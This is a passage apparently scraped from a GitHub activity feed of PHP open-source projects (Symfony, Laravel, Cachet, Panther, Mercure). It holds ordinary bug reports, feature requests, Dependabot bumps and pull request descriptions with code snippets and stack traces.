            $actions = json_decode(file_get_contents($sessionPath), true);
    
            $client = Client::createChromeClient();
    
            foreach ($actions as $action) {
                switch ($action['type']) {
                    case 'navigate':
                        $client->request('GET', $action['url']);
                        break;
                    case 'click':
                        $client->getCrawler()->filter($action['selector'])->click();
                        break;
                    case 'fill':
                        $client->getCrawler()->filter($action['selector'])->sendKeys($action['value']);
                        break;
                    default:
                        $output->writeln(sprintf('Unsupported action type: %s', $action['type']));
                        break;
                }
            }
    
            $output->writeln('Session replayed successfully.');
    
            return Command::SUCCESS;
        }
    }
    

Benefits

  • Simplifies automated test generation by converting user sessions to executable tests.
  • Reduces the time spent on manually writing tests.
  • Provides a reproducible method to simulate user interactions for debugging.

I am willing to contribute to this feature if there is interest from the maintainers.

View more
🚀 2
erseco

erseco

8th Feb 2025 @ 19:16

Bug Status: Needs Review Cache
Q A
Branch? 6.4
Bug fix? yes
New feature? no
Deprecations? no
Issues -
License MIT

PhpArrayAdapter::deleteItems() classifies each key as either stored (read-only, living in the warmed PHP file) or fallback (delegated to the fallback pool) by reading $this->keysbut it does so before calling initialize(), which is the method that actually populates $this->keys from the file.

public function deleteItems(array $keys): bool
{
    $deleted = true;
    $fallbackKeys = [];

    foreach ($keys as $key) {
        // ...
        if (isset($this->keys[$key])) {   // ← $this->keys is not initialized yet
            $deleted = false;
        } else {
            $fallbackKeys[] = $key;
        }
    }
    if (!isset($this->values)) {
        $this->initialize();              // ← too late
    }
    // ...
}

On a not-yet-initialized adapter $this->keys is empty, so every stored key is misclassified as a fallback key. deleteItem() (and every other method) calls initialize() first, so the two delete methods disagree.

Observable effect

When deleteItems() is the first call on a fresh instance and the key is stored/read-only, compared to the equivalent deleteItem():

$adapter = new PhpArrayAdapter($file, $fallbackPool); // $file has a stored key 'foo'

$adapter->deleteItem('foo');    // returns false, fallback pool untouched  (correct)
$adapter->deleteItems(['foo']); // returns TRUE, and deletes 'foo' from the fallback pool  (wrong)

So deleteItems():

  • returns true for a read-only key that cannot actually be deleted (should be false), and
  • forwards that key to the fallback pool, wrongly deleting an unrelated same-named entry there.

Once the adapter has been initialized by any prior operation, the bug disappears — it only bites when deleteItems() is the first call.

Fix

Hoist the existing initialize() guard above the loop, exactly as deleteItem(), hasItem(), save(), etc. already do. With the fix, deleteItem() and deleteItems() produce identical results (verified for stored keys, fallback-only keys, and mixed batches, on both cold and warm instances).

A regression test is added (the testDeleteItems* inherited from the integration suite are skipped for this read-only adapter, so this path was previously unasserted). It fails on the current code and passes with the fix.

View more
1 comment
sadiqk2

sadiqk2

13th Jul 2026 @ 11:15

Agent Status: Needs Review Status: Waiting feedback
Q A
Bug fix? no
New feature? no
Docs? no
Issues -
License MIT

This PR is to reduce state within the Toolbox class and simplify initialization logic.

View more
3 comments
makomweb

makomweb

30th Jun 2026 @ 12:34

If someone needs to support running the application on FrankenPHP and php-fpm, such as for debugging purposes, the bundle currently always sends a http request. We should add an option to prefer the built in hub if mercure_publish is available, even if mercure.url is defined.

View more
7 comments
henderkes

henderkes

4th Dec 2025 @ 15:50

dependencies github_actions

Bumps actions/checkout from 6 to 7.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

22nd Jun 2026 @ 01:53

dependencies github_actions

Bumps actions/cache from 3 to 6.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

29th Jun 2026 @ 16:52

When a Mercure Hub exception occurs, "Fail to send an update" is too vague to diagnose the issue. The hub logs are extremely dense, so troubleshooting them is very challenging. Additionally, throwing a RuntimeException is not ideal. It should throw a MercureException so it is easier to catch in an EventListener. Currently, I have to listen for RuntimeExceptions and fuzzy search:

str_contains($exception->getMessage(), 'Failed to send an update')

The Mercure bundle needs some work as it is very minimal atm.

View more
jusmark123

jusmark123

21st Jan 2026 @ 21:35

This is the exact same as I did here https://github.com/laravel/framework/pull/60519

This means queue attributes 🤝 model attributes (We are same same but different)

This essentially means, traits can carry model attributes which means we can put attributes on a trait, and reuse the trait.

This only checks traits on the current class in the hierarchy same as the other PR

Nice for package maintainers, or teams using traits.

#[Connection('warehouse')]
trait UsesWarehouse
{
  // scopes etc... that may be shared
}

class Product extends Model
{
    use UsesWarehouse;
}

class StockTransfer extends Model
{
    use UsesWarehouse;
}

I'm completely fine if you close this, just thought I'd try bring the same behaviour as queues to models for the attributes 🫡

View more
1 comment
jackbayliss

jackbayliss

22nd Jun 2026 @ 10:34

Changes In Code

Issue ticket number / Business Case

Checklist before requesting a review

  • I have written PHP tests.
  • I have updated the documentation in the readme where needed.
  • I have checked code styles, PHPStan etc. pass.
  • I have provided an issue/business case.
View more
peterfox

peterfox

30th Nov 2024 @ 11:56

Hello :)

I'm trying to use the bundle with a custom tokenprovider which is working for one part. So I have my tokenprovider which collects all subscribeable and publishable topics and creates a token with it.

That's working fine for the backend.

For the Client I wanted to send a cookie with a token and had a look at the Authorization class.

I would like to use it but it's not compatible with the token provider. I mean it would use a TokenFactory but not a Provider.

public function createCookie(Request $request, $subscribe = [], $publish = [], array $additionalClaims = [], ?string $hub = null): Cookie

I can generate a new cookie but I need all the topics again and it's not using my token provider.

I then thought of creating the cookie myself but then I can't use the MERCURE_AUTHORIZATION_COOKIE_NAME as it's private.

Maybe I've missed something but should't it be possible to use a service which implements TokenProviderInterface with the Authorization class too?

Thanks & best Alex

View more
alexz707

alexz707

20th Jun 2024 @ 12:13

Would be super cool to see how the Symfony Team creates a AGENTS.md file for the demo project.

The ai-bundle already has the file => https://github.com/symfony/ai-bundle/blob/main/AGENTS.md

Sure I can create my own, but to see what you add to the coding rules would be super interesting.

View more
2 comments
thedomeffm

thedomeffm

20th Feb 2026 @ 08:22

This MR adds the basic option to enable OAuth authentication through Github / Keycloak.

OAuth Login requires additional configuration from the user. This configuration is exposed through a set of new configuration variables.

It currently does not support any kind of roles / group management. This must be managed either trough the domain allowlist and/or on the provider side. All newly registered users are normal users and may be promoted though the web portal as necessary.

Implements #264

I would appreciate any feedback you may have!

View more
psuet

psuet

14th Mar 2026 @ 16:00

Hey guys,

I am new to cachet and I am trying to set up cachet queue in docker for making my application faster when there are multiple subscribers for sending email. According to the document

"Cachet uses a queue to send Configuring Mail and Beacons without slowing down the rest of the application. This can be setup in a variety of ways."

I have not found any document for doing this. Can someone help in figuring this out. I set up my status page with queue as Database

Thanks,

Vignesh

View more
1 comment
vsenapathy

vsenapathy

7th Jul 2020 @ 21:55

Laravel Version

13.8

PHP Version

8.4

Database Driver & Version

MySQL 8.0.18 for Windows 11 Pro on x86_64

Description

DatabaseLock::acquire() catches all QueryException instances indiscriminately in its INSERT fallback path, including errors that are not related (e.g. SQLSTATE[22001]: String data, right truncated). This turns permanent, unrecoverable errors into a 30-second retry loop that always ends in LockTimeoutException, masking the real cause.

When the lock INSERT fails, acquire() catches the QueryException and attempts an UPDATE assuming the failure was due to a duplicate key (i.e. the lock already exists). This assumption only holds for SQLSTATE 23xxx (Integrity Constraint Violation). Other SQL errors such as 22001 (value too long for column) are silently swallowed and cause the UPDATE to match zero rows, so acquire() returns false on every attempt until the block timeout expires.

I think DatabaseLock::adquire() must re-throw the exception if it is not an integrity constraint violation (SQLSTATE 23xxx), which is the only class of errors that legitimately indicates locking:

} catch (QueryException $e) {
    // just an example, maybe put this in a trait like `DetectsIntegrityConstraints`
    if (! str_starts_with($e->getSqlState(), '23')) {
        throw $e;
    }

    $updated = $this->connection->table($this->table)
        ->where('key', $this->name)
        ->where(fn ($q) => $q->where('owner', $this->owner)->orWhere('expiration', '<=',
$this->currentTime()))
        ->update(['owner' => $this->owner, 'expiration' => $this->expiresAt()]);

    $acquired = $updated >= 1;
}

I tested it on MySQL only. The fix should work on any SQL-92 compliant engine since SQLSTATE 23xxx is standardised, but I didn't verified this behaviour on other engines.

An alternative approach would be to validate the key length before attempting the INSERT and throw an explicit exception if it exceeds 255 characters, since the cache_locks migration defines the key column as $table->string('key')->primary();. However, this would only address the symptom in this specific table, whereas re-throwing non-23xxx exceptions fixes the underlying assumption in the catch block and protects against any unrecoverable QueryException, regardless of cause. Both fixes are complementary but the exception re-throw is the more robust solution.

This bug was discovered when investigating an infinite 503 refresh loop in a Statamic static cache installation. The lock key exceeded the VARCHAR(255) limit of the cache_locks table, causing repeated SQLSTATE[22001] errors that DatabaseLock::acquire() misidentified, retrying for 30 seconds before throwing LockTimeoutException.

Steps To Reproduce

Quick steps using composer:

composer create-project laravel/laravel laravel-db-cache-lock
cd laravel-db-cache-lock
# configure MySQL database on .env
php artisan migrate

php artisan tinker --execute="
  try {
      Cache::store('database')->lock(str_repeat('a', 260), 30)->block(5, fn() => 'ok');
  } catch (\Illuminate\Contracts\Cache\LockTimeoutException \$e) {
      echo 'LockTimeoutException thrown after 5s' . PHP_EOL;
  }
  "

The last command shows LockTimeoutException thrown after 5s and the expected result is an exception with the message SQLSTATE[22001]: String data, right truncated: 1406 Data too long for column 'key' at row 1

View more
1 comment
david-windsock

david-windsock

19th May 2026 @ 07:36

Feature

I don't know why it was proposed in #147 not to include entryExists in EntrypointLookupInterface, but it doesn't makes sense to test agains't a specific class instead of the interface.

In my case, this cause an issue as I cannot use dependence injection on EntrypointLookupInterface and expect entryExists to be present.

If this is not approved, I suggest adding entryExists to it's own interface and have EntrypointLookup implement both (although you won't fix the dependency injection problem).

View more
1 comment
lcharette

lcharette

20th Mar 2022 @ 23:44

svg file are not list in the .htaccess For exemple : /bundles/apiplatform/logo-header.svg

View more
ghost

ghost

13th Mar 2020 @ 18:13

Summary

Backports the Route::static() CDN-cacheable route API from the Laravel 13.x PR to Laravel 12.x.

This includes:

  • the fluent Route::static() method,
  • Illuminate\Routing\Middleware\CacheStaticResponse,
  • request-aware static-route middleware stripping,
  • final response hardening after the full HTTP middleware stack,
  • default cache.static configuration,
  • routing, middleware, kernel, and integration tests.

Backport Notes

The Laravel 13.x implementation uses Illuminate\Foundation\Http\Middleware\PreventRequestForgery in the default static-route middleware stripping list. Laravel 12.x uses Illuminate\Foundation\Http\Middleware\ValidateCsrfToken in the default web group, so this backport swaps the default to ValidateCsrfToken.

The rest of the behavior matches the 13.x PR:

  • cacheable static requests skip configured stateful middleware,
  • X-Inertia requests keep normal middleware and bypass static response mutation,
  • non-cacheable methods, non-cacheable statuses, and redirects are not made static,
  • cookies are stripped according to the route/config options,
  • Cache-Control, optional CDN-Cache-Control, and merged Vary headers are emitted,
  • the final kernel pass keeps Livewire-style global no-cache middleware from overriding static route cache headers.

Related PRs

Compatibility Verification

Verified with the Herd test app against the Laravel 12.x backport branch:

  • PHP 8.4 + Inertia 1 + Livewire 3: passed
  • PHP 8.4 + Inertia 1 + Livewire 4: passed
  • PHP 8.4 + Inertia 2 + Livewire 3: passed
  • PHP 8.4 + Inertia 2 + Livewire 4: passed
  • PHP 8.4 + Inertia 3 + Livewire 3: passed
  • PHP 8.4 + Inertia 3 + Livewire 4: passed
  • PHP 8.5 + Inertia 2 + Livewire 3: passed
  • PHP 8.5 + Inertia 2 + Livewire 4: passed
  • PHP 8.5 + Inertia 3 + Livewire 3: passed
  • PHP 8.5 + Inertia 3 + Livewire 4: passed

Inertia 1 was not installable on PHP 8.5 because inertiajs/inertia-laravel 1.x only allows PHP through 8.4.

Tests

Run with PHP 8.4 after refreshing local dependencies for the 12.x branch:

  • php84 vendor/bin/phpunit tests/Routing/RouteStaticMethodTest.php tests/Http/Middleware/CacheStaticResponseTest.php tests/Integration/Routing/RouteStaticResponseTest.php tests/Foundation/Http/KernelTest.php
  • php84 vendor/bin/phpunit tests/Routing/RoutingRouteTest.php tests/Http/Middleware/CacheTest.php
  • vendor/bin/pint config/cache.php src/Illuminate/Foundation/Http/Kernel.php src/Illuminate/Routing/Route.php src/Illuminate/Routing/Router.php src/Illuminate/Routing/Middleware/CacheStaticResponse.php tests/Foundation/Http/KernelTest.php tests/Routing/RouteStaticMethodTest.php tests/Http/Middleware/CacheStaticResponseTest.php tests/Integration/Routing/RouteStaticResponseTest.php
View more
DGarbs51

DGarbs51

27th May 2026 @ 04:13

The example given in https://docs.cachethq.io/api-reference/schedules/create-schedule does not work out of the box:

Here is a fixed version:

curl --request POST \
  --url http://localhost/api/schedules \
  --header 'Authorization: Bearer <token>' \
  --header 'Content-Type: application/json' \
  --header 'Accept: application/json' \
  --data '
{
  "name": "<string>",
  "message": "<string>",
  "scheduled_at": "2023-11-07 05:31:56",
  "completed_at": "2023-11-07 05:31:56",
  "components": [
    {
      "id": 123,
      "status": 1
    }
  ]
}
'
View more
👍 1
SlowMo24

SlowMo24

9th Jun 2026 @ 14:22

help wanted
View more
1 comment
julianstolp

julianstolp

11th Mar 2025 @ 14:11

a11y
View more
❤️ 1 🚀 1
danharrin

danharrin

12th Jul 2026 @ 22:57

Laravel Version

13.9.0

PHP Version

8.3

Database Driver & Version

No response

Description

When using the async feature of the http client facade without pool, the promises that are returned are mutable which to me is quite unexpected since guzzle promises are immutable and the promises returned are typed as the guzzle PromiseInterface.

The comment on PromiseInterface::then even state that it returns a new instance

/**
 * Appends fulfillment and rejection handlers to the promise, and returns
 * a new promise resolving to the return value of the called handler.
 *
 * @param callable $onFulfilled Invoked when the promise fulfills.
 * @param callable $onRejected  Invoked when the promise is rejected.
 */
public function then(
    ?callable $onFulfilled = null,
    ?callable $onRejected = null
): PromiseInterface;

In this example $pomise1, $promise2 and $promise3 all point to the same promise since the then function returns $this.

Artisan::command('promises', function () {
    $promise1 = Http::async()
        ->get('https://www.laravel.com')
        ->then(fn (Response $response) => $response->status());
    $promise2 = $promise1->then(fn ($records) => 'one');
    $promise3 = $promise2->then(fn ($records) => 'two');

    $result1 = $promise1->wait();
    $result2 = $promise2->wait();
    $result3 = $promise3->wait();

    dump($result1, $result2, $result3);
});

The output is:

"two"
"two"
"two"

The expected output would be:

200
"one"
"two"

Steps To Reproduce

Artisan::command('promises', function () {
    $promise1 = Http::async()->get('https://www.laravel.com');
    $promise2 = $promise1->then(fn ($records) => ['one', 'two']);
    $promise3 = $promise2->then(fn ($records) => ['three', 'four']);

    $result1 = $promise1->wait();
    $result2 = $promise2->wait();
    $result3 = $promise3->wait();

    dump($result1, $result2, $result3);
});
View more
1 comment 👍 1
rhysemmerson

rhysemmerson

20th May 2026 @ 05:09

help wanted

Octane Version

2.11.0

Laravel Version

12.20.0

PHP Version

8.3.23

What server type are you using?

FrankenPHP

Server Version

1.8.0

Database Driver & Version

No response

Description

I have an octane app running inside a docker container and use a bind mount for the application code. When editing files, fs events are not sent across the bind mount to the container, so the watcher does not detect them. I have the same issue reported in #487. There is also an open issue on the frankenphp repository https://github.com/php/frankenphp/issues/1616.

A potential solution would be to add an option to octane:frankenphp, like --chokidar to use chokidar instead of frankenphp's watcher.

Steps To Reproduce

Same as #487, but using frankenphp.

View more
8 comments 👍 1 🚀 1
rty765

rty765

14th Jul 2025 @ 19:46

I just tried upgrading webpack-dev-server to v6, but it fails to start:

> encore dev-server

Running webpack-dev-server ...

node:internal/modules/cjs/loader:714
    throw e;
    ^

Error [ERR_PACKAGE_PATH_NOT_EXPORTED]: Package subpath './bin/webpack-dev-server' is not defined by "exports" in /app/node_modules/webpack-dev-server/package.json
    at exportsNotFound (node:internal/modules/esm/resolve:314:10)
    at packageExportsResolve (node:internal/modules/esm/resolve:662:9)
    at resolveExports (node:internal/modules/cjs/loader:707:36)
    at Module._findPath (node:internal/modules/cjs/loader:774:31)
    at Module._resolveFilename (node:internal/modules/cjs/loader:1502:27)
    at wrapResolveFilename (node:internal/modules/cjs/loader:1071:27)
    at defaultResolveImplForCJSLoading (node:internal/modules/cjs/loader:1095:10)
    at resolveForCJSWithHooks (node:internal/modules/cjs/loader:1122:12)
    at Module._load (node:internal/modules/cjs/loader:1294:5)
    at wrapModuleLoad (node:internal/modules/cjs/loader:255:19)
    at Module.require (node:internal/modules/cjs/loader:1617:12)
    at require (node:internal/modules/helpers:153:16)
    at Object.<anonymous> (/app/node_modules/@symfony/webpack-encore/bin/encore.js:70:12)
    at Module._compile (node:internal/modules/cjs/loader:1871:14)
    at Object..js (node:internal/modules/cjs/loader:2002:10)
    at Module.load (node:internal/modules/cjs/loader:1594:32)
    at Module._load (node:internal/modules/cjs/loader:1396:12)
    at wrapModuleLoad (node:internal/modules/cjs/loader:255:19)
    at Module.executeUserEntryPoint [as runMain] (node:internal/modules/run_main:154:5)
    at node:internal/main/run_main_module:33:47 {
code: 'ERR_PACKAGE_PATH_NOT_EXPORTED'
}
View more
1 comment 👍 1
jdreesen

jdreesen

3rd Jul 2026 @ 09:22

Tried all the possibilities to install Symfony Demo (with symfony and composer) but when start Symfony Demo website, assets are not loaded.

View more
6 comments 👍 2
Hodzinek

Hodzinek

19th Feb 2024 @ 17:57

Bug Status: Needs Review

Hi,

I've just migrated from v2.32.0 to v2.36.0. Since then, I have some issues with my twig component and more precisely the nullsafe operator :

Before migration :

<twig:Page
    title="Commandes - Affaire : {{ affaire.numero }}"
    breadcrumb="Accueil > <a href='{{ pathIndex }}'>Affaires</a> > {{ lienParent }} {{ lienAffaire }} > Commandes"
    pageTitle="Affaire : {{ affaire.numero ~ ' - ' ~ affaire.commune?.organisation?.raisonSociale ~ ' - ' ~ affaire.libelle }}"
    :menuTabs="menu_tabs"
    :menu="menu"
>

In Page.html.twig :

<h2 class="page-title">
   {{ this.pageTitle }}
</h2>

Was working fine.

But now, if organisation is null, I get : "Impossible to access an attribute ("raisonSociale") on a null variable".

I have to set the variable before : {% set pageTitle = "Affaire : " ~ affaire.numero ~ ' - ' ~ affaire.commune?.organisation?.raisonSociale ~ ' - ' ~ affaire.libelle %} And then : :pageTitle="pageTitle"

I've migrated to v3.2.0 to see if there was a little regression that was corrected but no.

Am I missing something ?

Thank you !

Ps : I'm using twig/twig version v3.28.0 and <twig:Page :pageTitle="affaire.commune?.organisation?.raisonSociale" /> not working neither

View more
ThibaultJlvt

ThibaultJlvt

13th Jul 2026 @ 10:43

Covers the dev command, customizing and filtering dev processes, and the dev:list command.

View more
joetannenbaum

joetannenbaum

13th Jul 2026 @ 17:55

Status: Needs Review Feature
Q A
Bug fix? no
New feature? yes
Deprecations? no
Issues
License MIT

Summary

Slim v1 of symfony/ux-image — responsive image components addressing all feedback from the original PR #3188.

What's Included

<twig:ux:img> — Simple responsive images

  • Viewport-based width syntax (100vw md:80vw)
  • Automatic srcset/sizes generation
  • Density support (densities="x1 x2")
  • Fallback format for older browsers

<twig:ux:picture> — Art direction

  • Breakpoint-specific aspect ratios (sm:1:1 md:16:9)
  • Ratio cascading (CSS-like inheritance)
  • Exclusive media queries for correct aspect ratio

Key Changes from Original PR

Original Issue Resolution
liip/imagine-bundle in require Removed — no hard dependencies
No local file support PassThroughProvider works out of the box
PreloadManager controversy Removed entirely
Arrays instead of objects ImageConfig value object
Component name conflicts ux:img / ux:picture
Only TwigComponent syntax Also supports {{ ux_image() }}
Too many features Slim scope — iterate on v1

Provider Architecture

  • PassThroughProvider (default) — works with local files, no CDN required
  • UrlPatternProvider — generic CDN via URL template (Cloudflare, imgix, etc.)
  • Custom providers — implement ProviderInterface and tag with ux_image.provider

Usage

{# Simple responsive image #}
<twig:ux:img src="/images/hero.jpg" alt="Hero" width="100vw md:80vw" />

{# Art direction #}
<twig:ux:picture src="/images/banner.jpg" alt="Banner" width="100vw md:80vw" ratio="sm:1:1 md:16:9" />

{# Without Twig components #}
{{ ux_image('/images/hero.jpg', 'Hero', { width: '100vw md:80vw' }) }}

Configuration

# config/packages/ux_image.yaml
ux_image:
    default_provider: passthrough
    providers:
        cloudflare:
            pattern: '/cdn-cgi/image/w={width},f={format},q={quality}/{src}'

This addresses feedback from @WebMamba, @smnandre, and @Kocal on the original PR. Happy to iterate further!

View more
2 comments
KindImagination

KindImagination

18th May 2026 @ 05:33

Platform RFC

Hi there,

I've just integrated Mistral AI and related models into my application and I realised that I did not have any information about cached token usage. Here is a detailed note about it. Do not hesitate to correct me if I'm wrong into my appreciation.

Description

Mistral's Chat Completions API (/v1/chat/completions) supports prompt caching and returns the number of cached prompt tokens in the response under usage.prompt_tokens_details.cached_tokens (cached tokens are billed at 10% of the input price). See the official docs: https://docs.mistral.ai/studio-api/conversations/advanced/prompt-caching

It seems that the Mistral bridge's TokenUsageExtractor never reads that field, so the resulting TokenUsage always has cachedTokens === null. Any application relying on TokenUsage for cost accounting or cache observability cannot see Mistral cached tokens, which leads to an input-cost overestimate (the cached portion is billed at full rate instead of 10%).

Affected code

Symfony\AI\Platform\Bridge\Mistral\Llm\TokenUsageExtractor (src/platform/src/Bridge/Mistral/Llm/TokenUsageExtractor.php)

Current implementation only maps prompt_tokens, completion_tokens, total_tokens and the rate-limit headers:

return new TokenUsage(
    promptTokens: $content['usage']['prompt_tokens'] ?? null,
    completionTokens: $content['usage']['completion_tokens'] ?? null,
    remainingTokensMinute: null !== $remainingTokensMinute ? (int) $remainingTokensMinute : null,
    remainingTokensMonth: null !== $remainingTokensMonth ? (int) $remainingTokensMonth : null,
    totalTokens: $content['usage']['total_tokens'] ?? null,
);

cachedTokens is missing. The TokenUsage value object already supports it (TokenUsage::__construct(..., ?int $cachedTokens = null, ...)), and the OpenAI bridge populates it from input_tokens_details.cached_tokens in Symfony\AI\Platform\Bridge\OpenAi\Gpt\TokenUsageExtractor, so there is an established pattern.

How to reproduce

  1. Send two consecutive chat-completion requests that share a long common prefix (e.g. a large system prompt) to a Mistral model, with prompt_cache_key set on the request.
  2. Inspect the returned TokenUsage.

Expected: getCachedTokens() returns the value of usage.prompt_tokens_details.cached_tokens (a non-zero multiple of 64 once the cache is warm).

Actual: getCachedTokens() is always null.

Versions

  • symfony/ai-platform / Mistral bridge: 0.10 (also present on main at time of writing)
  • PHP: 8.4

Hope it is clear. Do not hesitate if I'm doing something wrong. Thanks for your amazing work and support.

Best !🤘

View more
ghisleouf

ghisleouf

24th Jun 2026 @ 17:07

Security Status: Needs Review Waiting Code Merge

Documents the new BeforeAuthenticateEvent added in symfony/symfony#64304.

The event is dispatched right before an authenticator's authenticate() method is called, primarily for auditing/logging authentication attempts (including ones targeting an unknown user, which CheckPassportEvent cannot observe).

View more
michaelthieulin

michaelthieulin

20th May 2026 @ 11:05

Updated make:command to generate a command with __invoke method.

Also added an option to use the old structure.

View more
3 comments ❤️ 3
seizan8

seizan8

27th Nov 2025 @ 21:51

Bug Status: Needs Review Chat
Q A
Bug fix? yes
New feature? no
Docs? no
Issues Fix #2198
License MIT

The original round-trip issue for UserMessage images (base64 vs. data URL mismatch) was already fixed by 8ca2ab09. This PR addresses the remaining case reported in the issue's follow-up: AssistantMessage content.

MessageNormalizer::normalizeAssistantParts() only handled Text, Thinking and ToolCall parts and silently dropped anything else. So an AssistantMessage carrying an Image (e.g. a generated image returned by Gemini) was lost on the way to the store and could not be read back.

File/Document/Image/Audio (as data URL) and ImageUrl/DocumentUrl parts are now handled on both the normalize and denormalize sides, mirroring what is already done for UserMessage content. Added a round-trip test for an AssistantMessage holding an Image.

View more
Amoifr

Amoifr

2nd Jul 2026 @ 04:58

Q A
Issues Companion to symfony/ux#3469
License MIT

Companion PR to symfony/ux#3469. Adds the Toolkit/Shadcn docs page for the sidebar recipe.

Kept as draft until symfony/ux#3469 (which introduces the upstream recipe) is merged.

Split out from the original #54 so each component can be reviewed/merged independently alongside its upstream recipe.

View more
Amoifr

Amoifr

18th Apr 2026 @ 14:21

Hi, I am trying to deploy cachetv3.x for test. But in my deployment I get this error when I try to login with a previous created admin user:

 Symfony\Component\HttpKernel\Exception\MethodNotAllowedHttpException 

 The POST method is not supported for route dashboard/login. Supported methods: GET, HEAD. 

PHP 8.2.27 — Laravel 11.38.2

Here is my .env file:

    APP_NAME=Cachet
    APP_ENV=local
    APP_KEY=
    APP_DEBUG=true
    APP_TIMEZONE=UTC
    APP_URL=http://localhost

    APP_LOCALE=en
    APP_FALLBACK_LOCALE=en
    APP_FAKER_LOCALE=en_US

    APP_MAINTENANCE_DRIVER=file

    BCRYPT_ROUNDS=12

    LOG_CHANNEL=stack
    LOG_STACK=single
    LOG_DEPRECATIONS_CHANNEL=null
    LOG_LEVEL=debug

    DB_CONNECTION=mysql
    DB_HOST=mysql
    DB_DATABASE=cachet
    DB_USERNAME=cachet
    DB_PASSWORD=cachet
    DB_PORT=3306

    SESSION_DRIVER=database
    SESSION_LIFETIME=120
    SESSION_ENCRYPT=false
    SESSION_PATH=/
    SESSION_DOMAIN=null

    BROADCAST_CONNECTION=log
    FILESYSTEM_DISK=local
    QUEUE_CONNECTION=database

    CACHE_STORE=database
    CACHE_PREFIX=

    REDIS_CLIENT=phpredis
    REDIS_HOST=redis
    REDIS_PASSWORD=null
    REDIS_PORT=6379

    VITE_APP_NAME="Cachet"

    CACHET_BEACON=true
    CACHET_EMOJI=false
    CACHET_AUTO_TWITTER=true
    CACHET_PATH=/

The hostname of redis and mysql can be resolved locally.

View more
5 comments 👍 1
itsfarbod

itsfarbod

21st Jan 2025 @ 09:04

dependencies Status: Needs Review javascript
View more
dependabot[bot]

dependabot[bot]

21st Jun 2026 @ 08:53

Hello! There is a strange issue I've found where if I'm running Panther in non-headless mode the site gets scraped as expected, however if I add --headless arg, it returns just: <html><head></head><body></body></html>. This is not isolated for just 1 site, I've already come across couple of them suffering from this issue.

Code snippet:

$client = Client::createChromeClient(__DIR__ . "/drivers/chromedriver", [ '--headless']);
$crawler = $client->request('GET', 'https://www.chanel.com/gb/fashion/p/G31318Y50006C8378/slingbacks-goatskin-grosgrain/');
echo $crawler->html();

When removing the headless option actual HTML of the site is obtained correctly. I'm using using chromedriver version 126.0.6478.126 for mac-x64 platform, but using the same version for linux yields the same result. The version of Panther is newest - 2.1.1.

View more
chovancovaa

chovancovaa

2nd Jul 2024 @ 11:31

Hi !

I am trying to deploy Cachet on an Openshift Cluster using this docker image. And no matter what type of config I try or what version I try, there is always an error somewhere or a feature not working.

Maybe I am doing something wrong in my deployment, but I tried to follow documentation and to do a deployment similar to the docker-compose one.

I am open to any suggestions to have a working deployement on an Openshift cluster.

Here is all the things I tried and the corresponding errors (I haven't tried everything because it takes time) :

Image from dockerhub

memcached is not available in this image and there is no variable to configure connection to anoher memcached instance, hence I have not tested with memcached for cache or sessions.

Image latest

updated 3 months ago, digest : sha256:1b1bcb00e588c6b43249a3a875140ecedca189c5a38f1b72593eb7415c1efde6

queue: Redis

session / cache apc array database file memcached redis
apc error 1
array error 1
database error 1
file error 1
memcached
redis error 1 error 1 error 1 error 1 error 1

queue: database

session / cache apc array database file memcached redis
apc error 1 error 1 error 1 error 1 error 1
array error 6 error 6 error 6 error 6 error 6
database error 1 error 1
file error 1
memcached
redis error 1 error 1

Image 2.3.15

most recent tag other than latest, updated 3 months ago, digest : sha256:c09a0e3ef78a88f7c1be8e67cc81545d13ff08b112fc54bf2e08c26af3e297a8

Little bug with this image, sometimes even if we are not logged in, there is a link logout at the bottom of the page with no effect when we click on it. And as soon as we leave the dashboard we are logged out. But sometimes this link is not present and we are not logged out when leaving the dashboard to see the status page for example. I have not diagnosed why and when this happens. There is some logs when clicking Dashboard in this situation : error 5
With this image when APP_DEBUG is set to true, the debug bar is not enabled.

queue: Redis

session / cache apc array database file memcached redis
apc error 2
array error 4
database error 4
file error 2
memcached
redis error 2 and error 3

queue: database

session / cache apc array database file memcached redis
apc error 2
array error 4
database error 2 [error 2][#2]
file error 2
memcached
redis error 2 and error 3

My own build (using gitlab)

I used the dockerfile from this repo to build this image. What I call latest is the image without changing the version build arg, so it builds the dev version of Cachet on branch 2.4. And the v2.3.18 is based on the v2.3.18 tag from the Cachet repository.

Image latest

queue: Redis

session / cache apc array database file memcached redis
apc error 1
array error 6
database error 1
file error 1
memcached
redis error 1 error 1

queue: database

session / cache apc array database file memcached redis
apc error 1
array error 6
database error 1
file error 1
memcached
redis error 1

image v2.3.18

queue: redis

session / cache apc array database file memcached redis
apc error 7
array error 4
database error 7
file
memcached error 7
redis error 7

queue: database

session / cache apc array database file memcached redis
apc error 7
array error 4
database error 7 error 7
file error 7
memcached
redis error 7
ErrorException thrown with message "Undefined variable: componentGroup (View: /var/www/html/resources/views/subscribe/manage.blade.php)"

Stacktrace:
#66 Illuminate\View\Engines\CompilerEngine:handleViewException in /var/www/html/vendor/laravel/framework/src/Illuminate/View/Engines/PhpEngine.php:45
#65 ErrorException in /var/www/html/storage/framework/views/01d9882a55d2483ff43d71a5718dcd19bcc868f8.php:46
